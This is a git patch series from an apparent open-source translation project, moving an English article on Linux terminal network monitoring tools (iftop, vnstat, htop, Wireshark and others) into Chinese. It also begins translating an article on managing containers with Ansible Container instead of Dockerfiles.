统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动、等等。 + +下载及更多 [信息在这里][9]。 + +### Dstat + + [![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] + +这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。 + +我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。 + +### Bwm-ng + + [![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] + +这是最简化的工具中的一个。它允许你去从交互式连接中取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。 + +我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。 + +### Ibmonitor + + [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] + +与上面的类似,它显示连接接口上过滤后的网络流量,并且,从接收到的流量中明确地区分区开发送流量。 + +我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。 +​ +### Htop - Linux 进程跟踪 + + [![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] + +Htop 是一个更高级的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理接口、快捷键、水平和垂直的进程视图、等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。 + +我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。 + +### Arpwatch - 以太网活动监视器 + + [![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] + +Arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析的程序。它持续监视以太网通讯并记录 IP 地址和 MAC 地址的变化。在一个网络中,它们的变化同时伴随记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。 + +我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。 + +### Wireshark - 网络监视工具 + + [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] + +**[Wireshark][1]** 是一个免费的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到通讯包中并查看每个包的内容 – 分开它们来满足你的特殊需要。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行是因为纪念那些年的荣誉。 + +最初它被认识是因为 Ethereal,Wireshark 有轻量化的、易于去理解的界面,它能分类显示来自不同的真实系统上的协议信息。 + +### 结论 + +​在这篇文章中,我们看了几个开源的网络监视工具。由于我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti、和 Zennos,并且,你需要去从你的个体情况考虑它们的每个工具的优势。 + +另外,还有不同的、更适合你的需要的不开源的工具。 + +你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些? + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux + +作者:[​​LinuxAndUbuntu][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:https://www.wireshark.org/ +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png +[3]:http://www.ex-parrot.com/pdw/iftop/ +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png +[5]:http://humdi.net/vnstat/ +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif +[7]:http://iptraf.seul.org/ +[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png +[9]:http://www.monitorix.org +[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png +[11]:http://dag.wiee.rs/home-made/dstat/ +[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png +[13]:http://sourceforge.net/projects/bwmng/ +[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg +[15]:http://ibmonitor.sourceforge.net/ +[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png +[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ +[18]:http://hisham.hm/htop/ +[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png +[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml +[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg + + From 7a2ab51c29191ca888798df33faf2250853b0ffe Mon Sep 17 00:00:00 2001 From: qhwdw Date: Thu, 7 Dec 2017 11:44:08 +0800 Subject: [PATCH 0376/1627] Translated by qhwdw --- ...Best Network Monitoring Tools For Linux.md | 189 ------------------ ...Best Network Monitoring Tools For Linux.md | 127 ++++++++++++ 2 files changed, 127 insertions(+), 189 deletions(-) delete mode 100644 sources/tech/20171203 Best Network Monitoring Tools For Linux.md create mode 100644 translated/tech/20171203 Best Network Monitoring Tools For Linux.md diff --git a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md b/sources/tech/20171203 Best Network Monitoring Tools For Linux.md deleted file mode 100644 index d53e4e0534..0000000000 --- a/sources/tech/20171203 Best Network Monitoring Tools For Linux.md +++ /dev/null @@ -1,189 +0,0 @@ -Translating by qhwdw -Best Network Monitoring Tools For Linux -=============================== - - -Keeping control of our network is vital to prevent any program from overusing it and slows down the overall system operation. There are several - -**network monitoring tools** - -for different operating systems today. In this article, we will talk about - -**10 network monitoring tools for Linux** - -that will run from a terminal, ideal for users who do not use GUI or for those who want to keep a control of the network use of a server through from ssh. - -### Iftop - - [![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] - -Linux users are generally familiar with Top. This tool is a system monitor that allows us to know in real time all the processes that are running in our system and can manage them easily. Iftop is an application similar to Top but specialized in the monitoring of the network, being able to know a multitude of details regarding the network and all the processes that are making use of it. - -We can obtain more information about this tool and download the necessary packages from the - -[following link][3] - -. - -### Vnstat - - [![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] **Vnstat** - -is a network monitor that is included, by default, in most Linux distributions. It allows us to obtain a real-time control of the traffic sent and received in a period of time, chosen by the user. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link.][5] - -### Iptraf - - [![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] **IPTraf** - -is a console-based, real-time network monitoring utility for Linux. (IP LAN) - Collects a wide variety of information as an IP traffic monitor that passes through the network, including TCP flags information, ICMP details, TCP / UDP traffic faults, TCP connection packet and Byne account. It also collects statistics information from the general and detailed interface of TCP, UDP,,, checksum errors IP not IP ICMP IP, interface activity, etc. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link.][7] - -### Monitorix - System and Monitoring Network - - [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] - -Monitorix is a lightweight free utility that is designed to run and monitor system and network resources with as many Linux / Unix servers as possible. An HTTP web server has been added that regularly collects system and network information and displays them in the graphs. It will track the average system load and its usage, memory allocation, disk health, system services, network ports, mail statistics (Sendmail, Postfix, Dovecot, etc.), MySQL statistics and many more. It is designed to control the overall performance of the system and helps in detecting faults, bottlenecks, abnormal activities, etc. - -​ - -Download and more - -[information here][9] - -. - -### Dstat - - [![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] - -A monitor is somewhat less known than the previous ones but also usually comes by default in many distributions. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link][11] - -. - -### Bwm-ng - - [![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] - -One of the simplest tools. It allows you to get data from the connection interactively and, at the same time, export them to a certain format for easier reference on another device. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link][13] - -. - -### Ibmonitor - - [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] - -Similar to the above, it shows network traffic filtered by connection interface and clearly separates the traffic sent from the received traffic. - -​ - -We can obtain more information about this tool and download the necessary packages from the - -[following link​][15] - -. - -### Htop - Linux Process Tracking - - [![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] - -Htop is a much more advanced, interactive and real-time Linux tool for tracking processes. It is similar to the top Linux command but has some advanced features such as an easy-to-use interface for process management, shortcut keys, vertical and horizontal view of processes and much more. Htop is a third-party tool and is not included on Linux systems, you must install it using - -**YUM** - -(or - -**APT-GET)** - -or whatever your package management tool. For more information on installation, read - -[this article][17] - -. - -We can obtain more information about this tool and download the necessary packages from the - -[following link.][18] - -### Arpwatch - Ethernet Activity Monitor - - [![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] - -Arpwatch is a program that is designed to control the resolution of addresses (MAC and changes in the IP address) of Ethernet network traffic in a Linux network. It is continuously monitoring the Ethernet traffic and records the changes in the IP addresses and MAC addresses, the changes of pairs along with the timestamps in a network. It also has a function to send an e-mail notifying the administrator, when a couple is added or changes. It is very useful in detecting ARP impersonation in a network. - -We can obtain more information about this tool and download the necessary packages from the - -[following link.​][20] - -### Wireshark - Network Monitoring tool - - [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] **[Wireshark][1]** - -is a free application that enables you to catch and view the information going forward and backward on your system, giving the capacity to bore down and read the substance of every parcel – separated to meet your particular needs. It is generally used to investigate arrange issues and additionally to create and test programming. This open-source convention analyzer is generally acknowledged as the business standard, prevailing upon what's coming to it's of honors the years. - -Initially known as Ethereal, Wireshark highlights an easy to understand interface that can show information from many diverse conventions on all real system sorts. - -### Conclusion - -​In this article, we have taken a gander at a few open source network monitoring tools. Because we concentrated on these instruments as the "best" does not really mean they are the best for your need. For instance, there are numerous other open source monitoring apparatuses that exist, for example, OpenNMS, Cacti, and Zennos and you need to consider the advantages of everyone from the point of view of your prerequisite. - -Additionally, there are different apparatuses that might be more good for your need that is not open source. - -​ - -What more network monitors do you use or know to use in Linux in terminal format? - --------------------------------------------------------------------------------- - -via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux - -作者:[​​LinuxAndUbuntu][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.linuxandubuntu.com -[1]:https://www.wireshark.org/ -[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png -[3]:http://www.ex-parrot.com/pdw/iftop/ -[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png -[5]:http://humdi.net/vnstat/ -[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif -[7]:http://iptraf.seul.org/ -[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png -[9]:http://www.monitorix.org -[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png -[11]:http://dag.wiee.rs/home-made/dstat/ -[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png -[13]:http://sourceforge.net/projects/bwmng/ -[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg -[15]:http://ibmonitor.sourceforge.net/ -[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png -[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ -[18]:http://hisham.hm/htop/ -[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png -[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml -[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg diff --git a/translated/tech/20171203 Best Network Monitoring Tools For Linux.md b/translated/tech/20171203 Best Network Monitoring Tools For Linux.md new file mode 100644 index 0000000000..8fc2cd25e3 --- /dev/null +++ b/translated/tech/20171203 Best Network Monitoring Tools For Linux.md @@ -0,0 +1,127 @@ +Linux 中最佳的网络监视工具 +=============================== + +保持对我们的网络的管理,防止任何程序过度使用网络、导致整个系统操作变慢,对管理员来说是至关重要的。对不同的系统操作,这是有几个网络监视工具。在这篇文章中,我们将讨论从 Linux 终端中运行的 10 个网络监视工具。它对不使用 GUI 而希望通过 SSH 来保持对网络管理的用户来说是非常理想的。 + +### Iftop + + [![iftop network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png)][2] + +与 Linux 用户经常使用的 Top 是非常类似的。这是一个系统监视工具,它允许我们知道在我们的系统中实时运行的进程,并可以很容易地管理它们。Iftop 与 Top 应用程序类似,但它是专门监视网络的,通过它可以知道更多的关于网络的详细情况和使用网络的所有进程。 + +我们可以从 [这个链接][3] 获取关于这个工具的更多信息以及下载必要的包。 + +### Vnstat + + [![vnstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/vnstat.png?1511885309)][4] + +**Vnstat** 是一个缺省包含在大多数 Linux 发行版中的网络监视工具。它允许我们在一个用户选择的时间周期内获取一个实时管理的发送和接收的流量。 + +我们可以从 [这个链接][5] 获取关于这个工具的更多信息以及下载必要的包。 + +### Iptraf + + [![iptraf monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif)][6] + +**IPTraf** 是一个 Linux 的、基于控制台的、实时网络监视程序。(IP LAN) - 收集经过这个网络的各种各样的信息作为一个 IP 流量监视器,包括 TCP 标志信息、ICMP 详细情况、TCP / UDP 流量故障、TCP 连接包和 Byne 报告。它也收集接口上全部的 TCP、UDP、…… 校验和错误、接口活动等等的详细情况。 + +我们可以从 [这个链接][7] 获取这个工具的更多信息以及下载必要的包。 + +### Monitorix - 系统和网络监视 + + [![monitorix system monitoring tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png)][8] + +Monitorix 是一个轻量级的免费应用程序,它设计用于去监视尽可能多的 Linux / Unix 服务器的系统和网络资源。一个 HTTP web 服务器可以被添加到它里面,定期去收集系统和网络信息,并且在一个图表中显示它们。它跟踪平均的系统负载、内存分配、磁盘健康状态、系统服务、网络端口、邮件统计信息(Sendmail、Postfix、Dovecot、等等)、MySQL 统计信息以及其它的更多内容。它设计用于去管理系统的整体性能,以及帮助检测故障、瓶颈、异常活动、等等。 + +下载及更多 [信息在这里][9]。 + +### Dstat + + [![dstat network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png)][10] + +这个监视器相比前面的几个知名度低一些,但是,在一些发行版中已经缺省包含了。 + +我们可以从 [这个链接][11] 获取这个工具的更多信息以及下载必要的包。 + +### Bwm-ng + + [![bwm-ng monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png)][12] + +这是最简化的工具中的一个。它允许你去从交互式连接中取得数据,并且,为了便于其它设备使用,在取得数据的同时,能以某些格式导出它们。 + +我们可以从 [这个链接][13] 获取这个工具的更多信息以及下载必要的包。 + +### Ibmonitor + + [![ibmonitor tool for linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg)][14] + +与上面的类似,它显示连接接口上过滤后的网络流量,并且,从接收到的流量中明确地区分区开发送流量。 + +我们可以从 [这个链接][15] 获取这个工具的更多信息以及下载必要的包。 +​ +### Htop - Linux 进程跟踪 + + [![htop linux processes monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png)][16] + +Htop 是一个更高级的、交互式的、实时的 Linux 进程跟踪工具。它类似于 Linux 的 top 命令,但是有一些更高级的特性,比如,一个更易于使用的进程管理接口、快捷键、水平和垂直的进程视图、等更多特性。Htop 是一个第三方工具,它不包含在 Linux 系统中,你必须使用 **YUM** 或者 **APT-GET** 或者其它的包管理工具去安装它。关于安装它的更多信息,读[这篇文章][17]。 + +我们可以从 [这个链接][18] 获取这个工具的更多信息以及下载必要的包。 + +### Arpwatch - 以太网活动监视器 + + [![arpwatch ethernet monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png)][19] + +Arpwatch 是一个设计用于在 Linux 网络中去管理以太网通讯的地址解析的程序。它持续监视以太网通讯并记录 IP 地址和 MAC 地址的变化。在一个网络中,它们的变化同时伴随记录一个时间戳。它也有一个功能是当一对 IP 和 MAC 地址被添加或者发生变化时,发送一封邮件给系统管理员。在一个网络中发生 ARP 攻击时,这个功能非常有用。 + +我们可以从 [这个链接][20] 获取这个工具的更多信息以及下载必要的包。 + +### Wireshark - 网络监视工具 + + [![wireshark network monitoring tool](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/editor/how-to-use-wireshark_1.jpg?1512299583)][21] + +**[Wireshark][1]** 是一个免费的应用程序,它允许你去捕获和查看前往你的系统和从你的系统中返回的信息,它可以去深入到通讯包中并查看每个包的内容 – 分开它们来满足你的特殊需要。它一般用于去研究协议问题和去创建和测试程序的特别情况。这个开源分析器是一个被公认的分析器商业标准,它的流行是因为纪念那些年的荣誉。 + +最初它被认识是因为 Ethereal,Wireshark 有轻量化的、易于去理解的界面,它能分类显示来自不同的真实系统上的协议信息。 + +### 结论 + +​在这篇文章中,我们看了几个开源的网络监视工具。由于我们从这些工具中挑选出来的认为是“最佳的”,并不意味着它们都是最适合你的需要的。例如,现在有很多的开源监视工具,比如,OpenNMS、Cacti、和 Zennos,并且,你需要去从你的个体情况考虑它们的每个工具的优势。 + +另外,还有不同的、更适合你的需要的不开源的工具。 + +你知道的或者使用的在 Linux 终端中的更多网络监视工具还有哪些? + +-------------------------------------------------------------------------------- + +via: http://www.linuxandubuntu.com/home/best-network-monitoring-tools-for-linux + +作者:[​​LinuxAndUbuntu][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxandubuntu.com +[1]:https://www.wireshark.org/ +[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iftop_orig.png +[3]:http://www.ex-parrot.com/pdw/iftop/ +[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/edited/vnstat.png +[5]:http://humdi.net/vnstat/ +[6]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/iptraf_orig.gif +[7]:http://iptraf.seul.org/ +[8]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/monitorix_orig.png +[9]:http://www.monitorix.org +[10]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/dstat_orig.png +[11]:http://dag.wiee.rs/home-made/dstat/ +[12]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/bwm-ng_orig.png +[13]:http://sourceforge.net/projects/bwmng/ +[14]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/ibmonitor_orig.jpg +[15]:http://ibmonitor.sourceforge.net/ +[16]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/htop_orig.png +[17]:http://wesharethis.com/knowledgebase/htop-and-atop/ +[18]:http://hisham.hm/htop/ +[19]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/arpwatch_orig.png +[20]:http://linux.softpedia.com/get/System/Monitoring/arpwatch-NG-7612.shtml +[21]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/how-to-use-wireshark_1_orig.jpg + + From c9fc207e958fafa2041b4d41f5c4657865151c7f Mon Sep 17 00:00:00 2001 From: qhwdw Date: Thu, 7 Dec 2017 11:53:53 +0800 Subject: [PATCH 0377/1627] Translating by qhwdw --- ...Linux containers with Ansible Container.md | 62 ++++++++++--------- 1 file changed, 32 insertions(+), 30 deletions(-) diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md index 0f200d73a8..624d25694a 100644 --- a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md +++ b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md @@ -1,44 +1,44 @@ -Translating by qhwdw How to manage Linux containers with Ansible Container +怎么去使用 Ansible Container 去管理 Linux 容器 ============================================================ -### Ansible Container addresses Dockerfile shortcomings and offers complete management for containerized projects. +### Ansible Container 处理 Dockerfile 的不足和对容器化项目提供完整的管理。 ![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") Image by : opensource.com -I love containers and use the technology every day. Even so, containers aren't perfect. Over the past couple of months, however, a set of projects has emerged that addresses some of the problems I've experienced. +我喜欢容器,并且每天都使用这个技术。在过去几个月,在一组项目中已经解决了我遇到的问题,即便如此,容器并不完美。 -I started using containers with [Docker][11], since this project made the technology so popular. Aside from using the container engine, I learned how to use **[docker-compose][6]** and started managing my projects with it. My productivity skyrocketed! One command to run my project, no matter how complex it was. I was so happy. +我刚开始时,用 [Docker][11] 使用容器,因为这个项目使这个技术非常流行。除此之外,使用这个容器引擎,我学到了怎么去使用 **[docker-compose][6]** 以及怎么去用它管理我的项目。使用它使我的生产力猛增!一个命令去运行我的项目,而不管它有多复杂。因此,我太高兴了。 -After some time, I started noticing issues. The most apparent were related to the process of creating container images. The Docker tool uses a custom file format as a recipe to produce container images—Dockerfiles. This format is easy to learn, and after a short time you are ready to produce container images on your own. The problems arise once you want to master best practices or have complex scenarios in mind. +使用一段时间之后,我发现了一些问题。最明显的问题是创建窗口镜像的过程。Docker 工具使用一个定制的文件格式作为一个 Recipe 去制作容器镜像 — Dockerfiles。这个格式很容易学会,并且很短的一段时间之后,你就可以为你自己制作容器镜像了。但是,一旦你希望去掌握最佳实践或者有复杂场景的想法,问题就会出现。 -More on Ansible +Ansible 的更多资源 -* [How Ansible works][1] +* [Ansible 是怎么工作的][1] -* [Free Ansible eBooks][2] +* [免费的 Ansible 电子书][2] -* [Ansible quick start video][3] +* [Ansible 快速上手视频][3] -* [Download and install Ansible][4] +* [下载和安装 Ansible][4] -Let's take a break and travel to a different land: the world of [Ansible][22]. You know it? It's awesome, right? You don't? Well, it's time to learn something new. Ansible is a project that allows you to manage your infrastructure by writing tasks and executing them inside environments of your choice. No need to install and set up any services; everything can easily run from your laptop. Many people already embrace Ansible. +让我们先休息一会儿,先去了解一个不同的东西:[Ansible][22] 的世界。你知道它吗?它棒极了,是吗?你不这么认为?好吧,是时候去学习一些新事物了。Ansible 是一个项目,它允许你通过写一些任务去管理你的基础设施,并在你选择的环境中运行它们。不需要去安装和设置任何的服务;你可以从你的笔记本电脑中去很很容易地做任何事情。许多人已经接受 Ansible 了。 -Imagine this scenario: You invested in Ansible, you wrote plenty of Ansible roles and playbooks that you use to manage your infrastructure, and you are thinking about investing in containers. What should you do? Start writing container image definitions via shell scripts and Dockerfiles? That doesn't sound right. +想像一下这样的场景:你在 Ansible 中,你写了很多的 Ansible 角色和 playbooks,你可以用它们去管理你的基础设施,并且想把它们运用到容器中。你应该怎么做?开始通过 shell 脚本和 Dockerfiles 去写容器镜像定义?听起来好像不对。 -Some people from the Ansible development team asked this question and realized that those same Ansible roles and playbooks that people wrote and use daily can also be used to produce container images. But not just that—they can be used to manage the complete lifecycle of containerized projects. From these ideas, the [Ansible Container][12] project was born. It utilizes existing Ansible roles that can be turned into container images and can even be used for the complete application lifecycle, from build to deploy in production. +来自 Ansible 开发团队的一些人问到这个问题,并且它们意识到,人们每天使用那些同样的 Ansible 角色和 playbooks 也可以用来制作容器镜像。但是 Ansible 能做到的不止这些 — 它可以被用于去管理容器化项目的完整的生命周期。从这些想法中,[Ansible Container][12] 项目诞生了。它使用已有的可以变成容器镜像的 Ansible 角色,甚至可以被用于应用程序在生产系统中从构建到部署的完整生命周期。 -Let's talk about the problems I mentioned regarding best practices in context of Dockerfiles. A word of warning: This is going to be very specific and technical. Here are the top three issues I have: +现在让我们讨论一下,在 Dockerfiles 环境中关于最佳实践时可能存在的问题。这里有一个警告:这将是非常具体且技术性的。出现最多的三个问题有: -### 1\. Shell scripts embedded in Dockerfiles. +### 1\. 在 Dockerfiles 中内嵌的 Shell 脚本。 -When writing Dockerfiles, you can specify a script that will be interpreted via **/bin/sh -c**. It can be something like: +当写 Dockerfiles 时,你可以通过 **/bin/sh -c** 解释指定的脚本。它可以做类似这样的事情: ``` RUN dnf install -y nginx ``` -where RUN is a Dockerfile instruction and the rest are its arguments (which are passed to shell). But imagine a more complex scenario: +RUN 处是一个 Dockerfile 指令并且其它的都是参数(它传递给 shell)。但是,想像一个更复杂的场景: ``` RUN set -eux; \ @@ -51,36 +51,36 @@ RUN set -eux; \     echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ ``` -This one is taken from [the official golang image][13]. It doesn't look pretty, right? +这仅是从 [the official golang image][13] 中拿来的一个。它看起来并不好看,是不是? -### 2\. You can't parse Dockerfiles easily. +### 2\. 你解析 Dockerfiles 并不容易。 -Dockerfiles are a new format without a formal specification. This is tricky if you need to process Dockerfiles in your infrastructure (e.g., automate the build process a bit). The only specification is [the code][14] that is part of **dockerd**. The problem is that you can't use it as a library. The easiest solution is to write a parser on your own and hope for the best. Wouldn't it be better to use some well-known markup language, such as YAML or JSON? +Dockerfiles 是一个没有正式规范的新格式。如果你需要在你的基础设施(比如,让构建过程自动化一点)中去处理 Dockerfiles 将会很复杂。仅有的规划是 [这个代码][14],它是 **dockerd** 的一部分。问题是你不能使用它作为一个库(library)。最容易的解决方案是你自己写一个解析器,然后祈祷它运行的很好。使用一些众所周知的标记语言不是更好吗?比如,YAML 或者 JSON。 -### 3\. It's hard to control. +### 3\. 管理困难。 -If you are familiar with the internals of container images, you may know that every image is composed of layers. Once the container is created, the layers are stacked onto each other (like pancakes) using union filesystem technology. The problem is, that you cannot explicitly control this layering—you can't say, "here starts a new layer." You are forced to change your Dockerfile in a way that may hurt readability. The bigger problem is that a set of best practices has to be followed to achieve optimal results—newcomers have a really hard time here. +如果你熟悉容器镜像的内部结构,你可能知道每个镜像是由层(layers)构成的。一旦容器被创建,这些层就使用联合文件系统技术堆叠在一起(像煎饼一样)。问题是,你并不能显式地管理这些层 — 你不能说,“这儿开始一个新层”,你被迫使用一种可读性不好的方法去改变你的 Dockerfile。最大的问题是,必须遵循一套最佳实践以去达到最优结果 — 新来的人在这个地方可能很困难。 -### Comparing Ansible language and Dockerfiles +### Ansible 语言和 Dockerfiles 比较 -The biggest shortcoming of Dockerfiles in comparison to Ansible is that Ansible, as a language, is much more powerful. For example, Dockerfiles have no direct concept of variables, whereas Ansible has a complete templating system (variables are just one of its features). Ansible contains a large number of modules that can be easily utilized, such as [**wait_for**][15], which can be used for service readiness checks—e.g., wait until a service is ready before proceeding. With Dockerfiles, everything is a shell script. So if you need to figure out service readiness, it has to be done with shell (or installed separately). The other problem with shell scripts is that, with growing complexity, maintenance becomes a burden. Plenty of people have already figured this out and turned those shell scripts into Ansible. +相比 Ansible,Dockerfiles 的最大缺点,也是 Ansible 的优点,作为一个语言,Ansible 更强大。例如,Dockerfiles 没有直接的变量概念,而 Ansible 有一个完整的模板系统(变量只是它其中的一个特性)。Ansible 包含了很多更易于使用的模块,比如,[**wait_for**][15],它可以被用于服务就绪检查,比如,在处理之前等待服务准备就绪。在 Dockerfiles 中,做任何事情都通过一个 shell 脚本。因此,如果你想去找出已准备好的服务,它必须使用 shell(或者独立安装)去做。使用 shell 脚本的其它问题是,它会变得很复杂,维护成为一种负担。很多人已经找到了这个问题,并将这些 shell 脚本转到 Ansible。 -If you are interested in this topic and would like to know more, please come to [Open Source Summit][16] in Prague to see [my presentation][17] on Monday, Oct. 23, at 4:20 p.m. in Palmovka room. +如果你对这个主题感兴趣,并且想去了解更多内容,请访问 [Open Source Summit][16],在 Prague 去看 [我的演讲][17],时间是 10 月 23 日,星期一,4:20 p.m. 在 Palmovka room 中。 - _Learn more in Tomas Tomecek's talk, [From Dockerfiles to Ansible Container][7], at [Open Source Summit EU][8], which will be held October 23-26 in Prague._ + _看更多的 Tomas Tomecek 演讲,[从 Dockerfiles 到 Ansible Container][7],在 [Open Source Summit EU][8],它将在 10 月 23-26 日在 Prague 召开。_ -### About the author +### 关于作者 - [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - Engineer. Hacker. Speaker. Tinker. Red Hatter. Likes containers, linux, open source, python 3, rust, zsh, tmux.[More about me][9] + 